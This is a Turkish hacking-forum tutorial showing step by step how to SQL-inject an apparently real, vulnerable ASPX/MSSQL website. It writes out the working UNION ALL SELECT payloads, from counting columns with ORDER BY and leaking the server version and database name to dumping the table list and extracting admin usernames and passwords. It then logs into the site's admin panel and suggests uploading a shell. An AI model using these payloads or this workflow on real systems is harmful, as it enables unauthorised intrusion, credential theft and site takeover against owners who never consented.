Neler Yeni

Sql İnjection Resimli Anlatım

Katılım
22 Nis 2020
Mesajlar
86
Tepkime puanı
23
Puanları
150
Selamun Aleyküm
Bu Konuda ASPX Siteye üzerinde Sql İnjection İşlemi yapmayı öğreneceğiz.

Öncelikle Sql Açıklı aspx sitemizi açtık;
l3yvwC.md.png


Tek Tırnak Atalım Bakalım Hata Alacakmıyız ?
Evet hata aldık.
Kolon Sayısı bulmaya geçelim.
FmFNiW.png


order by 8-- - Dedik Sayfa yine aynı;
Ekran-Alintisi.png



order by 9-- - diyelim bakalım değişim olacak mı ?
The ORDER BY position number 9 is out of range of the number of items in the select list. 9‘da bu hatayı aldık Bu hatayı aldık demek ki kolon sayımız 9‘dan az.
Her zaman hata aldığımız sayıdan önceki sayı kolon sayısıdır. Örnek:Biz 9‘da hata aldık kolon sayımız 8
s.png


+UNION+ALL+SELECT+1,2,3,4,5,6,7,8-- -
Evet iyi gidiyor bulunduğumuz sayfadaki fotoğrafın adıyla ilgili birşey çıktı.
bu iyiye gittiğine işaret.
yeni2.png



Version öğrenmek istiyorum.
+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8-- - dedim
Olumsuz sonuç aldım;
yeni3.png



null ile deniyelim.
Hackbar gt;Union Statement gt;NULL,NULL Seçeneğini seçtik.
bizden sayı isteyecek kolon sayımız olan 8‘i gireceğiz.
oluşturduğu url‘den olumlu sonuç çıkmayabilir null‘ları sırayla tek tek silerek deneyebilirsiniz.
UNION+ALL+SELECT+@@version,null,null,null,null,null,null,null--+- dedim.
Versiyon bilgisi bizde;
Conversion failed when converting the nvarchar value ‘Microsoft SQL Server 2012 - 11.0.5058.0 (X64)
May 14 2014 18:34:29
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.3 lt;X64 gt; (Build 9600: ) (Hypervisor)
‘ to data type int.
yeni4.png



Sıra Geldi Database Adı Almaya;
+UNION+ALL+SELECT+db_name(),null,null,null,null,null,null,null--+- dedik.
ve Database adımızı aldık.
a03.gif

Database Adı;
clienthostin_Dixon
yeni5.png


En karışık gibi görünen ama basit bir kısıma geldik
Union Based Seçeneğini Seçtik ve Dios Mssql dedik.
Dedikten sonra url sonuna uzunca bir kod ekledi
urlde küçük bir değişiklik yapacağız.
url sonundaki output into Chall1 END-- ‘i output into cw1 END-- - olarak değiştireceğiz.
ve üstteki ‘injected by rummykhan metnini injected by cw1 olarak değiştireceğiz.
ve komutu gireceğiz karşımıza kayda değer birşey çıkmayacak çünkü bu girdiğimiz komutun karşılığını diğer gireceğimiz komutta alacağız.
y01.gif

M3oJNF.png


Kolonları ve içerikleri önümüze dökelim;
+UNION+ALL+SELECT+output,null,null,null,null,null,null,null from cw1 --+- dedik.
ve sonuç;
Tablo adları ve kolonları kolon adları vs gözüküyor.
Bizim işimize yarayacak olan Tablo‘nun adı adminuser kolonları da username ve passwords.
yeni6.png



Evet İnjection İşlemimizdeki Son Aşamaya geldik.
UNION+ALL+SELECT+concat(username,0x3a,passwords),null,null,null,null,null,null,null from adminuser--+- dedik ve Admin bilgileri karşımızda.
y01.gif
a03.gif

Username:admin
Password:admins
yeni8.png



Şimdi Panele girmeyi deneyelim;
yeni9.png



Ve Paneldeyiz Artık İstediğimizi yapabiliriz ister shell vs atabiliriz.
yeni10.png



Selametle Kardeşlerim.
 
eyw sağolun
pm bakar mısın
 

Konuyu görüntüleyen kullanıcılar

Üst